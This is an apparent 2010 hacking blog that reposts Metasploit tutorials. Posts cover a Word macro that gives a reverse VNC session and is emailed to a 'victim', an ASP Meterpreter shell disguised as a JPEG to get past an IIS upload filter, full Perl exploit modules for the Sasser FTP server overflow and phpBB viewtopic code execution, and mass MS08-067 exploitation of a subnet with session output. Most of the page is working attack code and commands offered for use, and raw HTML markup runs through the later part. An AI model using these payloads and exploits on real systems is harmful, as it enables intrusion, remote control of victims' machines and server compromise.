Unofficial blog

Tuesday, January 5, 2010

Metasploit: Reverse VNC hidden in a Word file

Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user

Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect It,

there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router

Lets begin

1) Create a Macro to Intergate with word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system

3)now in Backtrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.

Video link for the above guide

http://blip.tv/file/1847504

http://wirelesspunter.blip.tv

Monday, January 4, 2010

Exploiting Microsoft IIS with Metasploit

First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:

$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp

Now we need to configure msfconsole to accept the incoming connection:

$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j

To avoid the image content validator, we will prepend a valid JPG image to our ASP script:

$ cat happy.jpg evil.asp > "evil.asp;.jpg"

$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"

Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:

[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami

nt authority\network service

Metasploit Blog

Metasploit? What is it?

What is it?
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
What does it do?
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.

Metasploit 3.3 Released

Version 3.3.3 of the Metasploit Framework has been released, featuring exploit safety rankings, a smaller EXE template, the addition of the InitialAutoRunScript option for Meterpreter, and the ability to run a script or command on all open sessions (sessions -c/-s). The complete release notes are online and version 3.3.3 can obtained from this download page

The Metasploit Framework

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task. Metasploit is written in the Ruby scripting language and is provided under the BSD license. More information about the framework can be found on the Framework site.

The latest downloads for the Metasploit Framework can be found on the Downloads page.

The development source of the Metasploit Framework can be retrieved from Subversion with the following command:

$ svn co https://www.metasploit.com/svn/framework3/trunk/

Please see the Installation and Updating pages for help installing the framework.

New users may be interested in the Feature Guide

The Wiki index may be a good starting point

Metasploit - msvidctl_mpeg2

msvidctl_mpeg2 from 4xteam on Vimeo.

Hacking Malware [Video Tut]

http://good.net/dl/bd/defcon-14-video/Defcon14-V12-Valsmith_and_Quist-Hacking_Malware.mp4/info

HD Video

"Hacking Malware"

Sasser FTPd - Remote exploit for the FTP

By Attack Research

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::sasser_ftpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };
my $info =
{
'Name' => 'sasser worm avserve FTP server Overflow',
'Version' => '$Revision: 1 $',
'Authors' =>
[ 'valsmith [at] metasploit.net>',
'chamuco [at] gmail.com>',
],

'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp' ],
'Priv' => 0,

'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'SSL' => [0, 'BOOL', 'Use SSL'],
'USER' => [1, 'DATA', 'Username', 'ftp'],
'PASS' => [1, 'DATA', 'Password', 'ftp'],
},

'Payload' =>
{
'Space' => 480,
'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
Windows sasser worm avserve ftp server exploit.
}),

'Refs' =>
[
['OSVDB', '6197']
],

'DefaultTarget' => 0,
'Targets' =>
[

['Windows XP SP1', 0x77e7633a ],
],

'Keys' => ['ftp'],

'DisclosureDate' => 'not applicable',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}

my $res = $s->Recv(-1, 20);
$s->Close();

if ($res !~ /5\.0\.3/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}

$self->PrintLine("[*] Vulnerable installation detected.");
return $self->CheckCode('Detected');
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the NOP module.");
return;
}


# DOS request version
# my $request = "PORT" . "\x41"x500;

my $request = "PORT". "\x90"x268 . "\xeb\x06\x90\x90" . $target .
"\xe9".pack('V',-1005) . "\x90"x15 . $shellcode . "\x90"x1530;

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

my $r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);

$s->Send("USER ".$self->GetVar('USER')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);

$s->Send("PASS ".$self->GetVar('PASS')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);

#$s->Send("$request\n");
$s->Send("$request\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);

sleep(2);
return;
}

phpBB Highlight - Remote exploit for phpBB

By Attack Research

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::phpbb_highlight;
use base "Msf::Exploit";
use Pex::Text;
use strict;

my $advanced = { };

my $info =
{
'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'valsmith [at] attackresearch.com>',
'H D Moore ',
],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'PHPBB_ROOT' => [1, 'URL', 'The phpBB root Directory', '/phpbb'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Payload' =>
{
'Space' => 1024,
'Keys' => ['cmd', 'cmd_bash'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits two arbitrary PHP code execution flaws in the
phpBB forum system. The problem is that the 'highlight' parameter
in the 'viewtopic.php' script is not verified properly and will
allow an attacker to inject arbitrary code via preg_replace().
}),

'Refs' =>
[
['OSVDB', 11719],
['OSVDB', 17613],
],

'DefaultTarget' => 0,
'Targets' => [
['Autotarget',0],
['phpbb <2.0.11', 1],
['phpbb <2.0.15', 2],
],

'Keys' => ['phpBB'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
my $target_idx = $self->GetVar('TARGET');
my $phpbb_root = $self->GetVar('PHPBB_ROOT');
my $user_agent = $self->GetVar('USER_AGENT');
my $target = $self->Targets->[$target_idx];
my $url;
my $byte;

# Add an echo on each end for easy output capturing
$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";

# Encode the command as a set of chr() function calls

if ($target_idx == 0) {

$url = $phpbb_root."/viewtopic.php?t=1&highlight=";
$url .= "%2527"."%252e"."phpinfo()". "%252e"."%2527";

my $request =
"GET $url HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";

$self->PrintLine("[*] Sending the malicious GET request...");
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

$s->Send($request);
my $results = $s->Recv(-1, 20);
$s->Close();

if ($results =~ /\phpinfo/) { <br /> $target_idx = 1; <br /> } <br /> <br /> else { $target_idx = 2; } <br /> <br /> } <br /> <br /> if ($target_idx =~ /1/) { <br /> $byte = join('%252e', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd)); <br /> $url = $phpbb_root."/viewtopic.php?t=1&highlight="; <br /> $url .= "%2527"."%252e"."passthru($byte)". "%252e"."%2527"; <br /> } <br /> <br /> if ($target_idx =~ /2/) { <br /> $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd)); <br /> $url = $phpbb_root."/viewtopic.php?t=1&highlight="; <br /> $url .= "%27."."passthru($byte)".".%27"; <br /> <br /> } <br /> <br /> my $request = <br /> "GET $url HTTP/1.1\r\n". <br /> "Host: $vhost:$target_port\r\n". <br /> "Connection: Close\r\n". <br /> "\r\n"; <br /> <br /> $self->PrintLine("[*] Sending the malicious GET request..."); <br /> my $s = Msf::Socket::Tcp->new <br /> ( <br /> 'PeerAddr' => $target_host, <br /> 'PeerPort' => $target_port, <br /> 'SSL' => $self->GetVar('SSL'), <br /> ); <br /> if ($s->IsError) { <br /> $self->PrintLine('[*] Error creating socket: ' . $s->GetError); <br /> return; <br /> } <br /> <br /> $s->Send($request); <br /> my $results = $s->Recv(-1, 20); <br /> $s->Close(); <br /> <br /> if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) { <br /> my $out = $1; <br /> $out =~ s/^\s+|\s+$//gs; <br /> if ($out) { <br /> $self->PrintLine('----------------------------------------'); <br /> $self->PrintLine(''); <br /> $self->PrintLine($out); <br /> $self->PrintLine(''); <br /> $self->PrintLine('----------------------------------------'); <br /> } <br /> } <br /> <br /> return; <br />} <br /> <br />1;</code> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn'>XyLeM</span> </span> <span class='post-timestamp'> at <a class='timestamp-link' href='http://meta-sploit.blogspot.com/2010/01/phpbb-highlight-remote-exploit-for.html' rel='bookmark' title='permanent link'><abbr class='published' title='2010-01-04T11:18:00-08:00'>11:18 AM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://meta-sploit.blogspot.com/2010/01/phpbb-highlight-remote-exploit-for.html#comment-form' onclick=''>0 comments</a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-control blog-admin pid-679096321'> <a href='https://www.blogger.com/post-edit.g?blogID=6914650419156458125&postID=3043783718680326261&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://meta-sploit.blogspot.com/search/label/phpBB' rel='tag'>phpBB</a>, <a href='http://meta-sploit.blogspot.com/search/label/Remote' rel='tag'>Remote</a>, <a href='http://meta-sploit.blogspot.com/search/label/sploitz' rel='tag'>sploitz</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='86012119472036919'></a> <h3 class='post-title entry-title'> <a href='http://meta-sploit.blogspot.com/2010/01/netcat-like-console-command-connect.html'>Netcat-like Console Command: Connect</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> A few weeks ago I committed the initial version of a new console command used to communicate with a host: connect. Since then I've slowly added a few more features.<br /><br />If you've ever used Netcat (all of you I'm sure), you'll feel right at home. If not, connect is quite simple to use and you should pick up on it quickly given the text below.<br /><br /><br />msf > connect -h<br />Usage: connect [options] <host> <port><br /><br />Communicate with a host, similar to interacting via netcat.<br /><br />OPTIONS:<br /><br /> -C Try to use CRLF for EOL sequence.<br /> -S <opt> Specify source address.<br /> -c <opt> Specify which Comm to use.<br /> -i <opt> Send the contents of a file.<br /> -p <opt> List of proxies to use.<br /> -s Connect with SSL.<br /> -w <opt> Specify connect timeout.<br /><br /><br /><br />As you can see, connect has many options to choose from. One very cool one is the -c option which allows you to, for example, route through a Meterpreter session. I show this below.<br /><br /><br />I've blocked HTTP access for this computer at the router:<br /><br /><br />msf > connect metasploit.com 80<br />[-] Unable to connect: The connection timed out (metasploit.com:80).<br /><br /><br /><br />But let's see if we can re-route this through another computer and get it working anyway:<br /><br /><br />msf > sessions -l<br /><br />Active sessions<br />===============<br /><br /> Id Description Tunnel<br /> -- ----------- ------<br /> 1 Meterpreter 192.168.10.3:44692 -> 192.168.10.7:4444 <br /><br />msf > connect -c 1 metasploit.com 80<br />[*] Connected to metasploit.com:80<br />HEAD / HTTP/1.0<br /><br />HTTP/1.1 200 OK<br />Date: Sun, 18 Jan 2009 15:01:22 GMT<br />[...]<br /><br /><br /><br />Booyah.<br /><br />Of course that was just one contrived example, but having a built-in netcat-like command should open up some doors for fun and profit.<br /><br />Enjoy!<br />Kris Katterjohn <br /><br />Metasploit Blog <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn'>XyLeM</span> </span> <span class='post-timestamp'> at <a class='timestamp-link' href='http://meta-sploit.blogspot.com/2010/01/netcat-like-console-command-connect.html' rel='bookmark' title='permanent link'><abbr class='published' title='2010-01-04T11:17:00-08:00'>11:17 AM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://meta-sploit.blogspot.com/2010/01/netcat-like-console-command-connect.html#comment-form' onclick=''>0 comments</a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-control blog-admin pid-679096321'> <a href='https://www.blogger.com/post-edit.g?blogID=6914650419156458125&postID=86012119472036919&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://meta-sploit.blogspot.com/search/label/Console' rel='tag'>Console</a>, <a href='http://meta-sploit.blogspot.com/search/label/Netcat-like' rel='tag'>Netcat-like</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='8744493955424885597'></a> <h3 class='post-title entry-title'> <a href='http://meta-sploit.blogspot.com/2010/01/metasploit-mass-exploitation-for.html'>Metasploit Mass Exploitation for Dummies</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.<br /><br />In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.<br /><br />To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.<br /><br /><br />msf > load db_sqlite3<br />[*] Successfully loaded plugin: db_sqlite3<br /><br /><br />Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:<br /><br /><br />msf > db_create<br />[*] The specified database already exists, connecting<br />[*] Successfully connected to the database<br />[*] File: /root/.msf3/sqlite3.db<br /><br /><br />To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:<br /><br /><br />msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24<br /><br /><br />Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:<br /><br /><br />msf > db_autopwn -e -p -b -m ms08_067<br /><br /><br />Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.<br /><br /><br />msf > sessions -l<br />Active sessions<br />===============<br /><br />Id Description Tunnel<br />-- ----------- ------<br />1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86<br /><br />msf > sessions -i 1<br />[*] Starting interaction with 1...<br /><br />Microsoft Windows XP [Version 5.1.2600]<br />(C) Copyright 1985-2001 Microsoft Corp.<br /><br />C:\WINDOWS\system32><br /><br /><br />Enjoy! <br /><br />Metasploit Blog <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn'>XyLeM</span> </span> <span class='post-timestamp'> at <a class='timestamp-link' href='http://meta-sploit.blogspot.com/2010/01/metasploit-mass-exploitation-for.html' rel='bookmark' title='permanent link'><abbr class='published' title='2010-01-04T11:13:00-08:00'>11:13 AM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://meta-sploit.blogspot.com/2010/01/metasploit-mass-exploitation-for.html#comment-form' onclick=''>0 comments</a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-control blog-admin pid-679096321'> <a href='https://www.blogger.com/post-edit.g?blogID=6914650419156458125&postID=8744493955424885597&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://meta-sploit.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a>, <a href='http://meta-sploit.blogspot.com/search/label/sploitz' rel='tag'>sploitz</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <h2 class='date-header'>Sunday, January 3, 2010</h2> <div class='post hentry uncustomized-post-template'> <a name='5603955261553744836'></a> <h3 class='post-title entry-title'> <a href='http://meta-sploit.blogspot.com/2010/01/metasploit-post-exploitation.html'>Metasploit Post Exploitation - Prefetchtool Meterpreter Script</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> <object height="300" width="400"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=7204412&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=7204412&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"></embed></object><p><a href="http://vimeo.com/7204412">Metasploit Post Exploitation - Prefetchtool Meterpreter Script</a> from <a href="http://vimeo.com/user2513983">Keith Lee</a> on <a href="http://vimeo.com">Vimeo</a>.</p> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn'>XyLeM</span> </span> <span class='post-timestamp'> at <a class='timestamp-link' href='http://meta-sploit.blogspot.com/2010/01/metasploit-post-exploitation.html' rel='bookmark' title='permanent link'><abbr class='published' title='2010-01-03T06:34:00-08:00'>6:34 AM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://meta-sploit.blogspot.com/2010/01/metasploit-post-exploitation.html#comment-form' onclick=''>0 comments</a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-control blog-admin pid-679096321'> <a href='https://www.blogger.com/post-edit.g?blogID=6914650419156458125&postID=5603955261553744836&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://meta-sploit.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a>, <a href='http://meta-sploit.blogspot.com/search/label/Meterpreter' rel='tag'>Meterpreter</a>, <a href='http://meta-sploit.blogspot.com/search/label/Vid' rel='tag'>Vid</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='4539165544830504188'></a> <h3 class='post-title entry-title'> <a href='http://meta-sploit.blogspot.com/2010/01/metasploit-vnc-injecting.html'>Metasploit - VNC Injecting</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> <object height="225" width="400"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=7917031&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=7917031&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="225"></embed></object><p><a href="http://vimeo.com/7917031">Metasploit => VNC Injecting</a> from <a href="http://vimeo.com/user2724314">Hazem Mofeed</a> on <a href="http://vimeo.com">Vimeo</a>.</p> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn'>XyLeM</span> </span> <span class='post-timestamp'> at <a class='timestamp-link' href='http://meta-sploit.blogspot.com/2010/01/metasploit-vnc-injecting.html' rel='bookmark' title='permanent link'><abbr class='published' title='2010-01-03T06:33:00-08:00'>6:33 AM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://meta-sploit.blogspot.com/2010/01/metasploit-vnc-injecting.html#comment-form' onclick=''>0 comments</a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-control blog-admin pid-679096321'> <a href='https://www.blogger.com/post-edit.g?blogID=6914650419156458125&postID=4539165544830504188&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://meta-sploit.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a>, <a href='http://meta-sploit.blogspot.com/search/label/Vid' rel='tag'>Vid</a>, <a href='http://meta-sploit.blogspot.com/search/label/VNC' rel='tag'>VNC</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='7461285012472246954'></a> <h3 class='post-title entry-title'> <a href='http://meta-sploit.blogspot.com/2010/01/metasploit-ie-unsafe-scripting-exploit.html'>Metasploit - IE Unsafe Scripting Exploit</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> <object height="320" width="400"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=8499386&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=8499386&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="320"></embed></object><p><a href="http://vimeo.com/8499386">IE Unsafe Scripting Exploit</a> from <a href="http://vimeo.com/user2889117">Rémi Heneault</a> on <a href="http://vimeo.com">Vimeo</a>.</p> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn'>XyLeM</span> </span> <span class='post-timestamp'> at <a class='timestamp-link' href='http://meta-sploit.blogspot.com/2010/01/metasploit-ie-unsafe-scripting-exploit.html' rel='bookmark' title='permanent link'><abbr class='published' title='2010-01-03T06:31:00-08:00'>6:31 AM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://meta-sploit.blogspot.com/2010/01/metasploit-ie-unsafe-scripting-exploit.html#comment-form' onclick=''>1 comments</a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-control blog-admin pid-679096321'> <a href='https://www.blogger.com/post-edit.g?blogID=6914650419156458125&postID=7461285012472246954&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://meta-sploit.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a>, <a href='http://meta-sploit.blogspot.com/search/label/IE' rel='tag'>IE</a>, <a href='http://meta-sploit.blogspot.com/search/label/Vid' rel='tag'>Vid</a>, <a href='http://meta-sploit.blogspot.com/search/label/Windows' rel='tag'>Windows</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='4944609888914912490'></a> <h3 class='post-title entry-title'> <a href='http://meta-sploit.blogspot.com/2010/01/metasploit-msrpc-exploit.html'>Metasploit - msrpc exploit</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> <object height="344" width="425"><param name="movie" value="http://www.youtube.com/v/mORbO58_M4Q&hl=it_IT&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/mORbO58_M4Q&hl=it_IT&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn'>XyLeM</span> </span> <span class='post-timestamp'> at <a class='timestamp-link' href='http://meta-sploit.blogspot.com/2010/01/metasploit-msrpc-exploit.html' rel='bookmark' title='permanent link'><abbr class='published' title='2010-01-03T06:27:00-08:00'>6:27 AM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://meta-sploit.blogspot.com/2010/01/metasploit-msrpc-exploit.html#comment-form' onclick=''>0 comments</a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-control blog-admin pid-679096321'> <a href='https://www.blogger.com/post-edit.g?blogID=6914650419156458125&postID=4944609888914912490&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://meta-sploit.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a>, <a href='http://meta-sploit.blogspot.com/search/label/Vid' rel='tag'>Vid</a>, <a 